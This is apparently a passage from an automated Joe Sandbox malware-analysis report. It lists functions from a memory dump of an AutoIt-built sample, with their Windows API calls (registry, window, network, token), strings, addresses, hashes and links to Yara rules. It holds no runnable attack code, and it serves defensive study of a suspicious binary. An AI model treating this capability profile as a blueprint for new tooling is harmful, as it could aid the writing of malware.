Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 37e1e25b11af5de378c88bc1da5d8a66287c37f6b48ad08f6d82b48dd0eb4615
Instruction ID: 5bda52d9b1e74eb7c9573112bebc1f5b5fd5d89691bb22af8cbca3b533ba75a8
Opcode Fuzzy Hash: 37e1e25b11af5de378c88bc1da5d8a66287c37f6b48ad08f6d82b48dd0eb4615
Instruction Fuzzy Hash: 012168B2204611EADB20BA34BC06EB773E8EF55350F54443AF886C7192EB5DAD42C3A5

Function 0079B1EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0079B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079B27F
_wcsstr.LIBCMT ref: 0079B289

Strings

@U=u, xrefs: 0079B221, 0079B259

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: 5eb38dc91ea4e080204d537370b093d0fb214bc7162558fba2351242ca1e712d
Instruction ID: d8c9fd7adb7e8d913aa287c1743a33b11e7acd1ac7ee93532ff02cb82a7ae31f
Opcode Fuzzy Hash: 5eb38dc91ea4e080204d537370b093d0fb214bc7162558fba2351242ca1e712d
Instruction Fuzzy Hash: 6A21F571204200BAEF159B75BD49E7F7B99EF49720F00813DFC05DA1A1EB69DC4097A0

Function 00799307 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00799320

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799352
__itow.LIBCMT ref: 0079936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00799392
__itow.LIBCMT ref: 007993A3

Strings

@U=u, xrefs: 00799320, 00799352, 00799392

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID: @U=u
API String ID: 2983881199-2594219639
Opcode ID: fd72b107ae4acb7ed36bf42a460403e4642cbccef19046e34aca568ef20ce3ff
Instruction ID: c90bf689934f276a6933256bd8aee688d8c56fd5057a4c4f30fb2b528dfa1ad2
Opcode Fuzzy Hash: fd72b107ae4acb7ed36bf42a460403e4642cbccef19046e34aca568ef20ce3ff
Instruction Fuzzy Hash: 4821C531700208EBEF109E699C89EAE7BADEB49710F04402DFE05E72D1D7B88D45D7A1

Function 007C75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007C7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007C763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007C764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007C7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007C7665

Strings

Msctls_Progress32, xrefs: 007C7603

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: e182cef40471d35c8aaa10e895c3f82b684a4fb4787c634eb2c6bbad3e63bf0f
Instruction ID: 454d9a7c573582fb1183b7eff48cca755ae14d70088987efcc220a368f18c4aa
Opcode Fuzzy Hash: e182cef40471d35c8aaa10e895c3f82b684a4fb4787c634eb2c6bbad3e63bf0f
Instruction Fuzzy Hash: 4A1190B2110219BFEF159F64CC85EE77F6DEF08798F014118BA04A60A0CB76AC21DBA4

Function 0076406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00763F85), ref: 00764085
GetProcAddress.KERNEL32(00000000), ref: 0076408C
RtlEncodePointer.NTDLL(00000000), ref: 00764097
RtlDecodePointer.NTDLL(00763F85), ref: 007640B2

Strings

combase.dll, xrefs: 00764080
RoUninitialize, xrefs: 00764074

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 0be396bfe65a1c034f62c9ae4484a532cc3bc47abc03f72113c6ca33235ab9b1
Instruction ID: 475f02de9779a69214288f4782498f2ffc7ea07b1ad34b199e156d4653486265
Opcode Fuzzy Hash: 0be396bfe65a1c034f62c9ae4484a532cc3bc47abc03f72113c6ca33235ab9b1
Instruction Fuzzy Hash: E7E0ECB0681300EFEB50AF61EC0DF053BBAB719742F10802AF502E11A1CBBF4605CB18

Function 007B6B03 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32(00000000,?), ref: 007B6C00
WSAGetLastError.WS2_32(00000000), ref: 007B6C34
htons.WS2_32(?), ref: 007B6CEA
inet_ntoa.WS2_32(?), ref: 007B6CA7

Part of subcall function 0079A7E9: _strlen.LIBCMT ref: 0079A7F3
Part of subcall function 0079A7E9: _memmove.LIBCMT ref: 0079A815

_strlen.LIBCMT ref: 007B6D44
_memmove.LIBCMT ref: 007B6DAD

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 33255517ad059c8ca54000cb07f8bbe4083d742a07bcd9be1052a414da4ee7bd
Instruction ID: b3afb1410dd1f0252056813db6f5619ef0882d032c895cb8d40550749253672a
Opcode Fuzzy Hash: 33255517ad059c8ca54000cb07f8bbe4083d742a07bcd9be1052a414da4ee7bd
Instruction Fuzzy Hash: 9081A271204200EBCB10EB24CC8AFABB7A9EF94714F54491DF6559B292DB78ED05CB92

Function 007A64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007A660B
_memmove.LIBCMT ref: 007A6546

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

_memmove.LIBCMT ref: 007A65B9
_memmove.LIBCMT ref: 007A66A0
_memmove.LIBCMT ref: 007A66B9
_memmove.LIBCMT ref: 007A66D5

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a4097bd3aa1f2db29de2292cb6da4cddf4ce332e667ae79a614bebd342b3e3e5
Instruction ID: cf3ec9c62df345581c9129693a29891c17e3d068d803ffd894ebc8b62605fa38
Opcode Fuzzy Hash: a4097bd3aa1f2db29de2292cb6da4cddf4ce332e667ae79a614bebd342b3e3e5
Instruction Fuzzy Hash: 34618D3190025ADBCF15EF64CC89AFF37A9AF86304F084618FD565B192DB39D915CB50

Function 007C01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 007C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BFDAD,?,?), ref: 007C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C038C
RegCloseKey.ADVAPI32(00000000), ref: 007C0399

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: f5f951926ffb437f4587fec90ca5d5199b32f0afddc596e4ad780f31c38c86d4
Instruction ID: 5e2d0a353e818e3daf19b1c362e47dd53a13924860989d80b1f55864e9e1c647
Opcode Fuzzy Hash: f5f951926ffb437f4587fec90ca5d5199b32f0afddc596e4ad780f31c38c86d4
Instruction Fuzzy Hash: CF512671208240EFC714EF64C889E6ABBE9FF85714F04891DF955872A2DB39E905CB92

Function 007C5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007C57FB
GetMenuItemCount.USER32(00000000), ref: 007C5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C585A
GetMenuItemID.USER32(?,?), ref: 007C58C9
GetSubMenu.USER32(?,?), ref: 007C58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 007C5928

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 7c21625cadd1034a499e85c5888b0f6ca8951573573262dd133437ddfd2613f2
Instruction ID: 0c0ed4a19e21e4b7016d6ac833e5e8413348241713788cbcf3f62da82f1d1290
Opcode Fuzzy Hash: 7c21625cadd1034a499e85c5888b0f6ca8951573573262dd133437ddfd2613f2
Instruction Fuzzy Hash: C0513A75A00615EFCF11AF64C845EAEB7B5EF48720F1040ADE952BB351CB79BE818B90

Function 0079EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0079EF06
VariantClear.OLEAUT32(00000013), ref: 0079EF78
VariantClear.OLEAUT32(00000000), ref: 0079EFD3
_memmove.LIBCMT ref: 0079EFFD
VariantClear.OLEAUT32(?), ref: 0079F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0079F078

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 8d328d887f1fea251afacc7854581fbf28681f117c77b1b20072cf4531750a29
Instruction ID: 0ba58c1a0d1c9571f02047e56e72f6777d5c4c0927d84d824e22caf1168c10e5
Opcode Fuzzy Hash: 8d328d887f1fea251afacc7854581fbf28681f117c77b1b20072cf4531750a29
Instruction Fuzzy Hash: B6516AB5A00209EFCB14DF58D884AAAB7B9FF4C314B15856AED59DB301E335E911CBA0

Function 007A220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A22A3
IsMenu.USER32(00000000), ref: 007A22C3
CreatePopupMenu.USER32 ref: 007A22F7
GetMenuItemCount.USER32(000000FF), ref: 007A2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A2386

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
Instruction ID: 9d909968b28c25d0564241617258f65501942de95206fae94dfcb327759278cd
Opcode Fuzzy Hash: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
Instruction Fuzzy Hash: 6251BD30600209EBDF25CF6CD888BADBBF5BF87314F108229E811A7292D77D8906CB51

Function 00741765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0074179A
GetWindowRect.USER32(?,?), ref: 007417FE
ScreenToClient.USER32(?,?), ref: 0074181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0074182C
EndPaint.USER32(?,?), ref: 00741876

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: ec493f96737fce76b3ff0b6e383559fb23fab97bfd71f68b99bc57007ad2e4b4
Instruction ID: 85aaf56017f2838f341016ab0e345a9e236f9b250586255bd70c0718738063b2
Opcode Fuzzy Hash: ec493f96737fce76b3ff0b6e383559fb23fab97bfd71f68b99bc57007ad2e4b4
Instruction Fuzzy Hash: B4418D30204600EFDB11EF24CC88FBB7BE9FB45764F148669F9A4871A1C7389885DB62

Function 007B709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,007B4E41,?,?,00000000,00000001), ref: 007B70AC

Part of subcall function 007B39A0: GetWindowRect.USER32(?,?), ref: 007B39B3

GetDesktopWindow.USER32 ref: 007B70D6
GetWindowRect.USER32(00000000), ref: 007B70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007B710F

Part of subcall function 007A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A52BC

GetCursorPos.USER32(?), ref: 007B713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B7199

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ffda5412e3ed888c873dba1718fcecf4b0780334863ddb55a1af662e4055a9fc
Instruction ID: 15254b3d1acf3df76a9fc6ee6b09b822c9c910dd3a37ab804f9f4176ae139d58
Opcode Fuzzy Hash: ffda5412e3ed888c873dba1718fcecf4b0780334863ddb55a1af662e4055a9fc
Instruction Fuzzy Hash: 0C31F272108309ABD724DF14D849F9BB7AAFFC8304F000919F58597191C638EA09CBA6

Function 007AEB23 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

Part of subcall function 0075FC86: _wcscpy.LIBCMT ref: 0075FCA9

_wcstok.LIBCMT ref: 007AEC94
_wcscpy.LIBCMT ref: 007AED23
_memset.LIBCMT ref: 007AED56

Strings

X, xrefs: 007AED93

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 395d8c99a71eebef548345b4e2d9d6d2ce164c8ccbff0be26f0cfea993426587
Instruction ID: 993e7d5d883742326d78dc1329ff121ff3164fdc801a944195f5735fb8f0aa3b
Opcode Fuzzy Hash: 395d8c99a71eebef548345b4e2d9d6d2ce164c8ccbff0be26f0cfea993426587
Instruction Fuzzy Hash: BDC16171608740DFC764EF24C889A5AB7E4FF85310F04492DF999972A2DB78EC45CB92

Function 00798879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007980C0
Part of subcall function 007980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007980CA
Part of subcall function 007980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007980D9
Part of subcall function 007980A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007980E0
Part of subcall function 007980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007980F6

GetLengthSid.ADVAPI32(?,00000000,0079842F), ref: 007988CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007988D6
RtlAllocateHeap.NTDLL(00000000), ref: 007988DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 007988F6
GetProcessHeap.KERNEL32(00000000,00000000,0079842F), ref: 0079890A
HeapFree.KERNEL32(00000000), ref: 00798911

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 97344460452d3c83e6eee04beca2a876bfd3b608b93b1da4df35a6580956ddf4
Instruction ID: 59f87036fccf595dd1382bcddb7918d0f197d3b1c67cedf5723fb4af4eb2ac4a
Opcode Fuzzy Hash: 97344460452d3c83e6eee04beca2a876bfd3b608b93b1da4df35a6580956ddf4
